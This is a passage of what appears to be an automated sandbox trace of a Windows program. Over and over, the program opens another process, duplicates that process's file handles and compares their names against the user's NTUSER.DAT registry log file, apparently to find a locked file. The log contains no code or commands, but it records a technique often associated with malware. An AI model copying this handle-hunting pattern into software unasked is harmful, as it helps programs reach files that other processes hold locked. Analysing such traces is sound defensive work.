0x0 [0152.951] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.951] CloseHandle (hObject=0x670) returned 1 [0152.951] _wcsicmp (_Str1="\\Libraries", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -2 [0152.951] CloseHandle (hObject=0x680) returned 1 [0152.951] CloseHandle (hObject=0x62c) returned 1 [0152.951] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.951] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x458, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.951] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.952] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.953] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.953] CloseHandle (hObject=0x670) returned 1 [0152.953] _wcsicmp (_Str1="\\Libraries", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -2 [0152.953] CloseHandle (hObject=0x680) returned 1 [0152.953] CloseHandle (hObject=0x62c) returned 1 [0152.953] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.953] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x47c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.953] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.954] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.954] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.954] CloseHandle (hObject=0x670) returned 1 [0152.954] _wcsicmp (_Str1="\\User Pinned", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 7 [0152.954] CloseHandle (hObject=0x680) returned 1 [0152.954] CloseHandle (hObject=0x62c) returned 1 [0152.954] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.954] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4f4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.955] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.955] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.956] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.956] CloseHandle (hObject=0x670) returned 1 [0152.956] _wcsicmp (_Str1="\\Start Menu", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0152.956] CloseHandle (hObject=0x680) returned 1 [0152.956] CloseHandle (hObject=0x62c) returned 1 [0152.956] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.956] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.956] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.957] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.958] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.958] CloseHandle (hObject=0x670) returned 1 [0152.958] _wcsicmp (_Str1="\\Start Menu", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0152.958] CloseHandle (hObject=0x680) returned 1 [0152.958] CloseHandle (hObject=0x62c) returned 1 [0152.958] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.958] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x504, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.958] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.959] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.960] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.960] CloseHandle (hObject=0x670) returned 1 [0152.960] _wcsicmp (_Str1="\\Start Menu", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0152.960] CloseHandle (hObject=0x680) returned 1 [0152.960] CloseHandle (hObject=0x62c) returned 1 [0152.960] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.960] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x50c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.960] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.961] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.961] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.961] CloseHandle (hObject=0x670) returned 1 [0152.961] _wcsicmp (_Str1="\\Start Menu", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0152.961] CloseHandle (hObject=0x680) returned 1 [0152.961] CloseHandle (hObject=0x62c) returned 1 [0152.961] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.962] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x514, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.962] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.962] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.963] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.963] CloseHandle (hObject=0x670) returned 1 [0152.963] _wcsicmp (_Str1="\\Desktop", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -10 [0152.963] CloseHandle (hObject=0x680) returned 1 [0152.963] CloseHandle (hObject=0x62c) returned 1 [0152.963] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.963] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x51c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.963] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.964] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.965] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.965] CloseHandle (hObject=0x670) returned 1 [0152.965] _wcsicmp (_Str1="\\Desktop", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -10 [0152.965] CloseHandle (hObject=0x680) returned 1 [0152.965] CloseHandle (hObject=0x62c) returned 1 [0152.965] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.965] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x524, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.965] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.966] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.966] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.966] CloseHandle (hObject=0x670) returned 1 [0152.966] _wcsicmp (_Str1="\\Desktop", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -10 [0152.966] CloseHandle (hObject=0x680) returned 1 [0152.966] CloseHandle (hObject=0x62c) returned 1 [0152.966] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.967] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x52c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.967] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.967] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.968] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.969] CloseHandle (hObject=0x670) returned 1 [0152.969] _wcsicmp (_Str1="\\Desktop", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -10 [0152.969] CloseHandle (hObject=0x680) returned 1 [0152.969] CloseHandle (hObject=0x62c) returned 1 [0152.969] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.969] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x534, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.969] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.970] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.970] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.970] CloseHandle (hObject=0x670) returned 1 [0152.970] _wcsicmp (_Str1="\\Burn", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -12 [0152.970] CloseHandle (hObject=0x680) returned 1 [0152.970] CloseHandle (hObject=0x62c) returned 1 [0152.970] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.970] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x53c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.971] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.971] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.981] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.981] CloseHandle (hObject=0x670) returned 1 [0152.981] _wcsicmp (_Str1="\\Burn", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -12 [0152.981] CloseHandle (hObject=0x680) returned 1 [0152.981] CloseHandle (hObject=0x62c) returned 1 [0152.981] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.981] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5ec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.981] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.982] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.982] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.982] CloseHandle (hObject=0x670) returned 1 [0152.982] _wcsicmp (_Str1="\\wdmaud.drv.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0152.982] CloseHandle (hObject=0x680) returned 1 [0152.983] CloseHandle (hObject=0x62c) returned 1 [0152.983] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.983] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.983] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.983] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.984] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.984] CloseHandle (hObject=0x670) returned 1 [0152.984] _wcsicmp (_Str1="\\MMDevAPI.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.984] CloseHandle (hObject=0x680) returned 1 [0152.984] CloseHandle (hObject=0x62c) returned 1 [0152.984] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.984] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x654, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.984] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.985] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.989] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.989] CloseHandle (hObject=0x670) returned 1 [0152.989] _wcsicmp (_Str1="\\bthprops.cpl.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -12 [0152.989] CloseHandle (hObject=0x680) returned 1 [0152.989] CloseHandle (hObject=0x62c) returned 1 [0152.989] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.989] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x664, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.989] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.990] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.991] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.991] CloseHandle (hObject=0x670) returned 1 [0152.991] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0152.991] CloseHandle (hObject=0x680) returned 1 [0152.992] CloseHandle (hObject=0x62c) returned 1 [0152.992] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.992] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x69c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.992] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.993] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.993] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.994] CloseHandle (hObject=0x670) returned 1 [0152.994] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0152.994] CloseHandle (hObject=0x680) returned 1 [0152.994] CloseHandle (hObject=0x62c) returned 1 [0152.994] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.994] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x6c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.994] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.995] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.996] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.996] CloseHandle (hObject=0x670) returned 1 [0152.996] _wcsicmp (_Str1="\\msutb.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.996] CloseHandle (hObject=0x680) returned 1 [0152.996] CloseHandle (hObject=0x62c) returned 1 [0152.996] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.996] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x6c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.996] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.997] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.998] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.998] CloseHandle (hObject=0x670) returned 1 [0152.998] _wcsicmp (_Str1="\\msctf.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.998] CloseHandle (hObject=0x680) returned 1 [0152.998] CloseHandle (hObject=0x62c) returned 1 [0152.998] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.999] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x72c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.999] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.999] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.000] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.000] CloseHandle (hObject=0x670) returned 1 [0153.000] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0153.000] CloseHandle (hObject=0x680) returned 1 [0153.000] CloseHandle (hObject=0x62c) returned 1 [0153.001] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.001] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.001] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.001] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.002] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.002] CloseHandle (hObject=0x670) returned 1 [0153.002] CloseHandle (hObject=0x680) returned 1 [0153.003] CloseHandle (hObject=0x62c) returned 1 [0153.003] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.003] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.003] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.004] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.004] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.004] CloseHandle (hObject=0x670) returned 1 [0153.005] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0153.005] CloseHandle (hObject=0x680) returned 1 [0153.005] CloseHandle (hObject=0x62c) returned 1 [0153.005] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.005] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7e8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.005] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.006] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.006] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.007] CloseHandle (hObject=0x670) returned 1 [0153.007] _wcsicmp (_Str1="\\Printer Shortcuts", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 2 [0153.007] CloseHandle (hObject=0x680) returned 1 [0153.007] CloseHandle (hObject=0x62c) returned 1 [0153.007] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.007] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7f0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.007] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.008] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.008] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.009] CloseHandle (hObject=0x670) returned 1 [0153.009] _wcsicmp (_Str1="\\Printer Shortcuts", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 2 [0153.009] CloseHandle (hObject=0x680) returned 1 [0153.009] CloseHandle (hObject=0x62c) returned 1 [0153.009] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.009] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x854, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.009] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.010] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.010] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.011] CloseHandle (hObject=0x670) returned 1 [0153.011] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0153.011] CloseHandle (hObject=0x680) returned 1 [0153.011] CloseHandle (hObject=0x62c) returned 1 [0153.011] OpenProcess 